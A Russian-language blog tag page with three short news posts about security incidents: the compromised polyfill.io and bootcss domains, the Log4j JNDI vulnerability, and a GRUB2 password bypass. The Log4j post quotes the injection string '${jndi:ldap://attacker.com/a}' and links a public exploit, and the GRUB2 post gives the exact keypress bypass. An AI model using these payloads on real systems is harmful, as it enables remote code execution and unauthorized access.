@RA

Тег решето в блоге RA

RA

Домены cdn[.]polyfill[.]io и bootcss[.]com скомпрометированы, заразив вредоносным кодом более 110 000 веб-сайтов
Изменение произошло после того, как подозреваемая китайская фирма приобрела домен в начале 2024 года.

На сайте предлагались широко используемые фрагменты кода для старых браузеров, которые позволяли использовать современные функции Javascript.

Вредоносное ПО распространяется через домен с февраля 2024 года.

Вредоносный код генерирует полезные нагрузки, которые различаются в зависимости от заголовков HTTP, что обеспечивает большую степень обфускации за счет активации только на определенных устройствах, задержки выполнения и обхода пользователей-администраторов, что позволяет избежать обнаружения.

Также было замечено, что Google блокирует рекламу Google Ads на веб-сайтах, использующих зараженный код, предположительно для уменьшения количества жертв. Технический гигант также разослал предупреждения владельцам сайтов. Владельцы сайтов должны как можно скорее принять меры для снижения рисков для себя и своих пользователей.

https://www.spiceworks.com/...ck-infects-websites/


Никогда такого не было и вот опять

Владельцы сайтов должны как можно скорее принять меры для снижения рисков для себя и своих пользователей.

Наконец-то начать загружать библиотеки со своего сервера.

RA

Уязвимость в Apache Log4j, затрагивающая многие Java-проекты
https://www.opennet.ru/open.../art.shtml?num=56319

проблеме подвержены почти все проекты, использующие такие фреймворки, как Apache Struts, Apache Solr, Apache Druid или Apache Flink, включая Steam, Apple iCloud, клиенты и серверы игры Minecraft.

Проблема была вызвана тем, что log4j поддерживает обработку специальных масок "{}" в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой "${jndi:ldap://attacker.com/a}", при обработке которой log4j отправит на сервер attacker.com LDAP-запрос пути к Java-классу. Возвращённый сервером атакующего путь (например, http://second-stage.attacker.com/Exploit.class) будет загружен и выполнен в контексте текущего процесса, что позволяет атакующему добиться выполнения произвольного кода в системе с правами текущего приложения.

Эксплоит
https://github.com/tangxiaofeng7/apache-log4j-poc

--
Вот эту фичу с загрузкой классов и их выполнению всегда считал какой-то java-дичью.

RA

в загрузчике Grub2 обнаружена уязвимость, позволяющая обходить защиту паролем, и дающая полный доступ к шеллу.
Эксплоит: вместо введения пароля нажать на Backspace ровно 28 раз, а потом Enter
Если вместо ввода пароля нажимать на Backspace, то из-за пропущенной проверки программа заезжает за пределы буфера и начинает затирать нулями память с отрицательным смещением.

http://malaya-zemlya.livejournal.com/757068.html
http://hmarco.org/bugs/CVE-...tication-bypass.html

Добавить пост

Вы можете выбрать до 10 файлов общим размером не более 10 МБ.
Для форматирования текста используется Markdown.